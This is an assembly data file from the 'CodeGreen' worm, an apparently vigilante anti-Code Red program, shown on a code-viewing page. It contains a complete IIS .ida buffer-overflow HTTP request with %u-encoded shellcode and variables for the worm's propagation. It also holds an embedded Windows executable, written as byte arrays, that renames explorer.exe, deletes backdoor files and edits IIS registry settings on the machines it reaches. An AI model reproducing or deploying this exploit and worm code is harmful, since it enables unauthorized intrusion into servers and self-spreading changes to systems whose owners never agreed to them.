📄 codegreen_variablen.inc
字号:
DB "133TW", 0 ;4: SUBLANG_CHINESE_TRADITIONAL
DB "150CS", 0 ;5: LANG_CZECH
DB "128DA", 0 ;6: LANG_DANISH
DB "144DE", 0 ;7: LANG_GERMAN
DB "132EL", 0 ;8: LANG_GREEK
DB "131EN-US", 0 ;9: LANG_ENGLISH
DB "137ES", 0 ;10: LANG_SPANISH
DB "117FI", 0 ;11: LANG_FINNISH
DB "106FR", 0 ;12: LANG_FRENCH
DB "106HE", 0 ;13: LANG_HEBREW
DB "139HU", 0 ;14: LANG_HUNGARIAN
DB 0 ;15: - (LANG_ICELANDIC)
DB "100IT", 0 ;16: LANG_ITALIAN
DB "117JA", 0 ;17: LANG_JAPANESE
DB "148KO", 0 ;18: LANG_KOREAN
DB "122NL", 0 ;19: LANG_DUTCH
DB "111NO", 0 ;20: LANG_NORWEGIAN
DB "116PL", 0 ;21: LANG_POLISH
DB "110PT", 0 ;22: LANG_PORTUGUESE
DB "137PT-BR", 0 ;23: SUBLANG_PORTUGUESE_BRAZILIAN
DB 0 ;24: - (LANG_ROMANIAN)
DB "127RU", 0 ;25: LANG_RUSSIAN
DB 0 ;26: - (LANG_SERBIAN)
DB 0 ;27: - (LANG_CROATIAN)
DB 0 ;28: - (LANG_SLOVAK)
DB "125SV", 0 ;29: LANG_SWEDISH
DB 0 ;30: - (LANG_THAI)
DB "111TR", 0 ;turkish ;31 Entries ;31: LANG_TURKISH
Net_BrowserName DB "CodeGreen V1.0", 0
LenPatchFile DD 0
MemPointer DD 0
PatchFileName DB "CG_Patch.exe", 0
; *** propagation routine ***
EndThreadsFlag DB 0 ;1: EndThreads
NrOfThreads DW 0
ptrNewCodeGreen DD 0
LenNewCodeGreen DD 0
CritSec_GetIP CRITICAL_SECTION <?,?,?,?,?,?>
CurrentIP DD 0
CritSec_SendCG CRITICAL_SECTION <?,?,?,?,?,?>
SelectTimeVal DD 5 ;sec
DD 0 ;usec
CurrentSystemTime DW 0 ;+0: year
DW 0 ;+2: month
DW 0 ;+4: dayofweek
DW 0 ;+6: day
DW 0 ;+8: hour
DW 0 ;+10: minute
DW 0 ;+12: second
DW 0 ;+14: milliseconds
RandVal DD 0
CGExploit_start EQU $
CGExploitLen EQU CGExploit_ends - CGExploit_start
CodeGreenExploit DB "GET /default.ida?"
DB "Code_Green_<I_like_the_colour-_-><AntiCodeRed-CodeRedIII-IDQ_Patcher>_V1.0_beta_written_by_'Der_HexXer'-Wuerzburg_Germany-_is_dedicated_to_my_sisterli_'Doro'.Save_Whale_and_visit_<www.buhaboard.de>_and_<www.buha-security.de>" ;.Greets_to_PARKER"
DB "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0",0Dh,0Ah
DB "Content-type: text/xml",0Ah
DB "Accept: */*",0Ah
DB "Content-length: "
CodeGreenExploitLenStr DB "3379 ",0Dh,0Ah
DB 0Dh,0Ah
CGExploit_ends EQU $
; *** embedded EXE / AntiCodeRed ***
OldExplorer DB "C:\explorer.exe", 0
NewExplorer DB "C:\ex__X_er._X_", 0
eExeContent1 DB 77, 90, 144, 0, 3, 0, 0, 0, 4, 0, 0, 0, 255, 255, 0, 0, 184, 0, 0, 0
DB 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
DB 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
DB 192, 0, 0, 0, 14, 31, 186, 14, 0, 180, 9, 205, 33, 184, 1, 76, 205, 33, 84, 104
DB 105, 115, 32, 112, 114, 111, 103, 114, 97, 109, 32, 99, 97, 110, 110, 111, 116, 32, 98, 101
DB 32, 114, 117, 110, 32, 105, 110, 32, 68, 79, 83, 32, 109, 111, 100, 101, 46, 13, 13, 10
DB 36, 0, 0, 0, 0, 0, 0, 0, 125, 21, 5, 219, 57, 116, 107, 136, 57, 116, 107, 136
DB 57, 116, 107, 136, 57, 116, 107, 136, 43, 116, 107, 136, 53, 84, 101, 136, 56, 116, 107, 136
DB 82, 105, 99, 104, 57, 116, 107, 136, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
DB 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 80, 69, 0, 0, 76, 1, 3, 0
DB 141, 183, 143, 59, 0, 0, 0, 0, 0, 0, 0, 0, 224, 0, 15, 1, 11, 1, 5, 12
DB 0, 2, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 16, 0, 0
DB 0, 32, 0, 0, 0, 0, 8, 3, 0, 16, 0, 0, 0, 2, 0, 0, 4, 0, 0, 0
DB 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 4, 0, 0
DB 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 16, 0, 0, 16, 0, 0, 0, 0, 16, 0
DB 0, 16, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
DB 56, 32, 0, 0, 80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
DB 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
DB 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
DB 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
DB 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 56, 0, 0, 0, 0, 0, 0, 0
DB 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
DB 46, 116, 101, 120, 116, 0, 0, 0, 96, 1, 0, 0, 0, 16, 0, 0, 0, 2, 0, 0
DB 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 96
DB 46, 114, 100, 97, 116, 97, 0, 0, 142, 1, 0, 0, 0, 32, 0, 0, 0, 2, 0, 0
DB 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 64
DB 46, 100, 97, 116, 97, 0, 0, 0, 244, 5, 0, 0, 0, 48, 0, 0, 0, 2, 0, 0
DB 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 192
DD 464
eExeContent2 DB 179, 66, 183, 2, 254, 195, 141, 53, 0, 48, 8, 3, 136, 30, 141, 61
DB 16, 48, 8, 3, 136, 31, 104, 128, 0, 0, 0, 86, 232, 27, 1, 0, 0, 87, 86, 232
DB 14, 1, 0, 0, 141, 53, 45, 48, 8, 3, 136, 30, 104, 128, 0, 0, 0, 86, 232, 1
DB 1, 0, 0, 86, 232, 227, 0, 0, 0, 141, 53, 73, 48, 8, 3, 136, 30, 104, 128, 0
DB 0, 0, 86, 232, 232, 0, 0, 0, 86, 232, 202, 0, 0, 0, 254, 207, 10, 255, 117, 164
DB 141, 61, 116, 48, 8, 3, 106, 0, 84, 106, 2, 106, 0, 87, 104, 2, 0, 0, 128, 232
DB 226, 0, 0, 0, 91, 141, 53, 181, 48, 8, 3, 191, 4, 0, 0, 0, 96, 139, 254, 51
DB 192, 51, 201, 73, 252, 242, 174, 79, 43, 254, 137, 124, 36, 24, 97, 81, 87, 106, 1, 106
DB 0, 86, 3, 241, 70, 83, 232, 173, 0, 0, 0, 79, 11, 255, 117, 216, 83, 232, 156, 0
DB 0, 0, 104, 0, 4, 0, 0, 104, 244, 49, 8, 3, 232, 111, 0, 0, 0, 131, 248, 0
DB 116, 48, 61, 0, 4, 0, 0, 127, 41, 191, 244, 49, 8, 3, 3, 248, 190, 32, 48, 8
DB 3, 185, 12, 0, 0, 0, 128, 127, 255, 92, 116, 4, 198, 7, 92, 71, 243, 164, 106, 3
DB 104, 244, 49, 8, 3, 232, 82, 0, 0, 0, 104, 64, 119, 27, 0, 232, 66, 0, 0, 0
DB 104, 0, 16, 32, 0, 104, 203, 48, 8, 3, 104, 236, 48, 8, 3, 106, 0, 232, 8, 0
DB 0, 0, 106, 0, 232, 13, 0, 0, 0, 204, 255, 37, 48, 32, 8, 3, 255, 37, 32, 32
DB 8, 3, 255, 37, 24, 32, 8, 3, 255, 37, 16, 32, 8, 3, 255, 37, 36, 32, 8, 3
DB 255, 37, 20, 32, 8, 3, 255, 37, 40, 32, 8, 3, 255, 37, 28, 32, 8, 3, 255, 37
DB 4, 32, 8, 3, 255, 37, 0, 32, 8, 3, 255, 37, 8, 32, 8, 3
DD 160
eExeContent3 DB 94, 33, 0, 0
DB 80, 33, 0, 0, 112, 33, 0, 0, 0, 0, 0, 0, 246, 32, 0, 0, 26, 33, 0, 0
DB 232, 32, 0, 0, 56, 33, 0, 0, 218, 32, 0, 0, 14, 33, 0, 0, 48, 33, 0, 0
DB 0, 0, 0, 0, 192, 32, 0, 0, 0, 0, 0, 0, 184, 32, 0, 0, 0, 0, 0, 0
DB 0, 0, 0, 0, 206, 32, 0, 0, 48, 32, 0, 0, 152, 32, 0, 0, 0, 0, 0, 0
DB 0, 0, 0, 0, 66, 33, 0, 0, 16, 32, 0, 0, 136, 32, 0, 0, 0, 0, 0, 0
DB 0, 0, 0, 0, 128, 33, 0, 0, 0, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
DB 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 94, 33, 0, 0, 80, 33, 0, 0
DB 112, 33, 0, 0, 0, 0, 0, 0, 246, 32, 0, 0, 26, 33, 0, 0, 232, 32, 0, 0
DB 56, 33, 0, 0, 218, 32, 0, 0, 14, 33, 0, 0, 48, 33, 0, 0, 0, 0, 0, 0
DB 192, 32, 0, 0, 0, 0, 0, 0, 187, 1, 77, 101, 115, 115, 97, 103, 101, 66, 111, 120
DB 65, 0, 85, 83, 69, 82, 51, 50, 46, 100, 108, 108, 0, 0, 84, 0, 68, 101, 108, 101
DB 116, 101, 70, 105, 108, 101, 65, 0, 117, 0, 69, 120, 105, 116, 80, 114, 111, 99, 101, 115
DB 115, 0, 100, 1, 71, 101, 116, 87, 105, 110, 100, 111, 119, 115, 68, 105, 114, 101, 99, 116
DB 111, 114, 121, 65, 0, 0, 196, 1, 77, 111, 118, 101, 70, 105, 108, 101, 65, 0, 73, 2
DB 83, 101, 116, 70, 105, 108, 101, 65, 116, 116, 114, 105, 98, 117, 116, 101, 115, 65, 0, 0
DB 115, 2, 83, 108, 101, 101, 112, 0, 173, 2, 87, 105, 110, 69, 120, 101, 99, 0, 75, 69
DB 82, 78, 69, 76, 51, 50, 46, 100, 108, 108, 0, 0, 69, 1, 82, 101, 103, 67, 108, 111
DB 115, 101, 75, 101, 121, 0, 78, 1, 82, 101, 103, 68, 101, 108, 101, 116, 101, 86, 97, 108
DB 117, 101, 65, 0, 92, 1, 82, 101, 103, 79, 112, 101, 110, 75, 101, 121, 69, 120, 65, 0
DB 65, 68, 86, 65, 80, 73, 51, 50, 46, 100, 108, 108
DD 116
eExeContent4 DB 67, 58, 92, 101, 120, 112, 108, 111, 114, 101, 114, 46
DB 101, 120, 101, 0, 67, 58, 92, 65, 110, 116, 105, 67, 111, 100, 101, 46, 82, 101, 100, 0
DB 101, 120, 112, 108, 111, 114, 101, 114, 46, 101, 120, 101, 0, 67, 58, 92, 105, 110, 101, 116
DB 112, 117, 98, 92, 115, 99, 114, 105, 112, 116, 115, 92, 114, 111, 111, 116, 46, 101, 120, 101
DB 0, 67, 58, 92, 112, 114, 111, 103, 114, 97, 126, 49, 92, 99, 111, 109, 109, 111, 110, 126
DB 49, 92, 115, 121, 115, 116, 101, 109, 92, 77, 83, 65, 68, 67, 92, 114, 111, 111, 116, 46
DB 101, 120, 101, 0, 83, 89, 83, 84, 69, 77, 92, 67, 117, 114, 114, 101, 110, 116, 67, 111
DB 110, 116, 114, 111, 108, 83, 101, 116, 92, 83, 101, 114, 118, 105, 99, 101, 115, 92, 87, 51
DB 83, 86, 67, 92, 80, 97, 114, 97, 109, 101, 116, 101, 114, 115, 92, 86, 105, 114, 116, 117
DB 97, 108, 32, 82, 111, 111, 116, 115, 0, 47, 115, 99, 114, 105, 112, 116, 115, 0, 47, 109
DB 115, 97, 100, 99, 0, 47, 99, 0, 47, 100, 0, 68, 101, 115, 32, 72, 101, 120, 88, 101
DB 114, 39, 115, 32, 67, 111, 100, 101, 71, 114, 101, 101, 110, 32, 86, 49, 46, 48, 32, 98
DB 101, 116, 97, 0, 67, 111, 100, 101, 71, 114, 101, 101, 110, 32, 104, 97, 115, 32, 101, 110
DB 116, 101, 114, 101, 100, 32, 121, 111, 117, 114, 32, 115, 121, 115, 116, 101, 109, 13, 10, 105
DB 116, 32, 116, 114, 105, 101, 100, 32, 116, 111, 32, 112, 97, 116, 99, 104, 32, 121, 111, 117
DB 114, 32, 115, 121, 115, 116, 101, 109, 32, 97, 110, 100, 13, 10, 116, 111, 32, 114, 101, 109
DB 111, 118, 101, 32, 67, 111, 100, 101, 82, 101, 100, 73, 73, 39, 115, 32, 98, 97, 99, 107
DB 100, 111, 111, 114, 115, 13, 10, 13, 10, 13, 10, 89, 111, 117, 32, 109, 97, 121, 32, 117
DB 110, 105, 110, 115, 116, 97, 108, 108, 32, 116, 104, 101, 32, 112, 97, 116, 99, 104, 32, 118
DB 105, 97, 13, 10, 83, 121, 115, 116, 101, 109, 80, 97, 110, 101, 108, 47, 83, 111, 102, 119
DB 97, 114, 101, 58, 32, 87, 105, 110, 100, 111, 119, 115, 32, 50, 48, 48, 48, 32, 72, 111
DB 116, 102, 105, 120, 32, 91, 81, 51, 48, 48, 57, 55, 50, 93, 13, 10, 13, 10, 103, 101
DB 116, 32, 100, 101, 116, 97, 105, 108, 115, 32, 97, 116, 32, 34, 119, 119, 119, 46, 109, 105
DB 99, 114, 111, 115, 111, 102, 116, 46, 99, 111, 109, 34, 46, 13, 10, 118, 105, 115, 105, 116
DB 32, 34, 119, 119, 119, 46, 98, 117, 104, 97, 45, 115, 101, 99, 117, 114, 105, 116, 121, 46
DB 100, 101, 34, 13, 10
DD 15
eExeContent5 EQU $
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -